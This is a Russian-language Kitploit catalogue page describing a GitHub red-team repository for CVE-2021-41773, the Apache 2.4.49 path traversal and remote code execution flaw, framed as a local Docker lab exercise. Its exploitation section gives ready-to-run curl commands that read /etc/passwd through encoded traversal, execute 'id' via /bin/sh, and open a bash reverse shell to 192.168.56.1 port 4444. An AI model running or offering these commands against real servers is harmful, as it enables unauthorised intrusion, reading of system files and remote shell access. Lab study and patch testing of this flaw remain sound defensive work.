Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Path Traversal RCE | Kitploit
Инструменты/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Path Traversal RCE

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 — Apache HTTP Server 2.4.49 Обход пути / Удаленное выполнение кода

Департамент кибербезопасности ITSOLERA — Задача Красной команды №3
Команда: Offensive Team Zeta
Дата: 18 марта 2026 года


⚠️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных целей.
Все тесты проводились в изолированной локальной Docker-лаборатории.
Никогда не используйте против активных, производственных или сторонних систем.


Сводка CVE

ПолеДетали
CVE IDCVE-2021-41773
CVSS9.8 КРИТИЧЕСКИЙ
ЗатронутоТолько Apache HTTP Server 2.4.49
ТипОбход пути + Удаленное выполнение кода
Исправлено вApache 2.4.51

Содержимое репозитория

ФайлОписание
poc_41773.pyСкрипт эксплойта PoC на Python с баннером Team Zeta
docker-compose.ymlНастройка уязвимой лабораторной среды
offensive_zeta_shell.txtЖурнал сессии — подтверждение эксплуатации
screenshots/Скриншоты доказательств
Offensive_Team_Zeta_FINAL_Report.pdfПолный отчет об эксплуатации

Настройка лаборатории

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Эксплуатация

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Скачать инструмент